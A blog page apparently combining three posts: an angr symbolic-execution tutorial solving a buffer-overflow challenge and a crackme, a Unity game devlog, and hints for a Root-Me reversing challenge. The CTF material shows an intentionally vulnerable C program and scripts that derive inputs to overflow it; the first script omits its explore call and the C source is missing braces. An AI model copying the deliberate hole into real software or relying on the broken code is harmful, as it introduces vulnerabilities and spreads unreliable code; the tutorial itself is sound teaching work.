Introduction to Angr

I always wanted to play around with a binary analysis framework but most of the time I was turned off by how difficult it was to install and use it. Just recently I’ve thought to give angr a try and now I want to share my experience with you! I will present you a two scripts that solve two challenges, if you wish to dig deeper and learn Angr then you should visit it’s official documentation.

angr is a python framework for analyzing binaries. It combines both static and dynamic symbolic (“concolic”) analysis, making it applicable to a variety of tasks.

For me the easiest way to install Angr and get it working on the first try was to download Kali linux, install it in VirtualBox (make sure you have at least 12 GB space for the disk) and execute: pip install angr
From here you can setup your Python dev environment in Kali as you please.

For the first challenge we have the following source code:

//written by bla
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)

        int count = atoi(argv[1]);
        int buf[10];

        if(count >= 10 ) 
                return 1;

        //printf("%lx\n", (size_t)(count * sizeof(int)));
        memcpy(buf, argv[2], count * sizeof(int));
        if(count == 0x574f4c46) {
                //execl("/bin/sh", "sh" ,NULL);
    } else
                printf("Not today son\n");

        return 0;

Challenge source: level-7

The goal is to find two arguments to give to the program in order to overflow buf into count and display WIN. We can attempt to solve this with trial and error, debugging, do some computation or we can make Angr solve it for us with the following Python script.

import angr
import claripy

def resolve_win(state):
    # if the bytes of "WIN" are found in stdout it returns true
    return  b"WIN" in state.posix.dumps(1)

if __name__ == '__main__':

    # Declare project, load the binary
    proj = angr.Project('./lab-13/0-tutorial/level07')

    # Create a 32-bit symbolic bitvector named "password"
    arg1 = claripy.BVS('sym_arg', 8 * 11)  # maximum 11 * 8 bits
    arg2 = claripy.BVS('sym_arg', 8 * 44)  # maximum 44 * 8 bits

    # We construct an entry_state passing the two arguments
    st = proj.factory.entry_state(args=['./level07', arg1, arg2])
    # he st.libc.max_strtol_len tweak tells the atoi/strtol symbolic representation to
    # resolve strings that are of at most 11 bytes length (the default is 10)
    st.libc.max_strtol_len = 11

    # Now we will create what in angr terms is called a simulation manager.
    pg = proj.factory.simgr(st)

    # This can be read as: explore looking for the path p for which the current state
    # p.state contains the string "WIN" in its standard output (p.state.posix.dumps(1),
    # where 1 is the file descriptor for stdout).

    print("solution found")
    s = pg.found[0]
    print(s.posix.dumps(1)) # dump stdout

    # Print and eval the fist argument
    print("Arg1: ", s.solver.eval(arg1, cast_to=bytes))
    # Print and eval the second argument
    print("Arg2: ", s.solver.eval(arg2, cast_to=bytes))

Running the script will give us the solution for this binary, if the binary would change slightly (the count) we can still run the script and get a solution.

The next challenge is easier, the binary is called multiple-styles and it can be downloaded from here:

By looking at it’s disassembly output:

multiple-styles disassembly

We can see that the program does the following things:

  1. Calls read which reads the ‘password’ from stdin into a buffer.
  2. Loads the string “myvnvsuowsxs}ynk” into a buffer.
  3. Loops through the buffer byte by byte adds 10 00400a27 add dword [rbp-0x54 {var_5c_2} {var_5c_1}], 0xa to it and compares it with the previously loaded string.
  4. If they match it will jump to 0x00400a6c and print “you got it!”

At this point we can google for online caesar cipher, paste the string that got loaded and decipher it with an offset of -10, but we’re going to let angr decipher the password for us.

import angr
import claripy

if __name__ == '__main__':
    proj = angr.Project("./multiple-styles", auto_load_libs=False)

    # Create a 32-bit symbolic bitvector named "password"
    password = claripy.BVS('password', 20*8)

    # We construct a blank_state with the address of main and we pass password to stdin
    st = proj.factory.blank_state(addr=0x004009ae, stdin=password)

    # We create a simulation manager
    pg = proj.factory.simulation_manager(st)

    # We tell angr to look for 0x00400a6c which is the starting address of the green block
    # that prints "you got it!" while telling him to avoid the address 0x00400a40
    pg.explore(find=(0x00400a6c), avoid=(0x00400a40))

    print("solution found")
    # We grab the solution.
    s = pg.found[0]

    # We can print the contents of stdin - 0:
    print("Flag: ", s.posix.dumps(0))

    # We can also get the password from our symbolic bitvector
    print("Pass: ", s.solver.eval(password, cast_to=bytes))

While writing the scripts I’ve used angr version ` Please consult Angr’s official documentation if you wish to learn more!

Thank you for reading! 😀


MAD: Game DevLog #4, Main Menu, Camera Shake and Enemies

Hello everyone!

Here’s what we did for our 4th devlog:

We’ve added a game menu to the game it is interactive and it’s working without any code at all. Thanks to Brackeys for making awesome tutorials, here’s the one we used for the menu:

After creating the main menu, we wanted to juice up the game a little and we’ve researched a ways to shake the camera when a bomb explodes.

The fist approach was naive and it didn’t work. I was taking the camera’s position and moving it randomly, which felt robotic. Luckily for us, Unity has a built in perlin noise generator for Cinemachine, the package we use for managing cameras.

The Perlin noise was developed by Ken Perlin and it is:

a technique used to produce natural appearing textures on computer generated surfaces for motion picture visual effects.

Unity also lets us tune the generator by modifying its amplitude and frequency parameters, which makes it very convenient to use.

Last but not least we weren’t satisfied with the enemies, we still have some bugs with their behavior but Andrei was there to fix them.

What I did instead was to try to make some decent enemy sprites in Aseprite, Cosmigo Pro Motion doesn’t work on my Mac :(.

Snow Enemy v1

Since I don’t have enough practice my sprites don’t look that good, I tried to keep them as simple as possible and I’ve only used two key frames when animating them.

If you want to start making Pixel Art there are lot of free tutorials on the internet. Here’s some to get you started:

Thanks for reading and have a nice day!

Root-Me Reversing: crackme_wtf hints

It’s been some time since I’ve done some Reverse Engineering and today I’ve completed a simple challenge on The filename of the challenge is crackme_wtf and here are some hints to get you started:

  1. Determine type of FILEs.
  2. Don’t be afraid to patch and use a debugger.
  3. Try to eliminate the randomness. Maybe some functions that have to do with time, random numbers or the current process’s id.
  4. If the last hint doesn’t yield any results… Is the required password really needed to get to the flag?

Thanks for reading and good luck!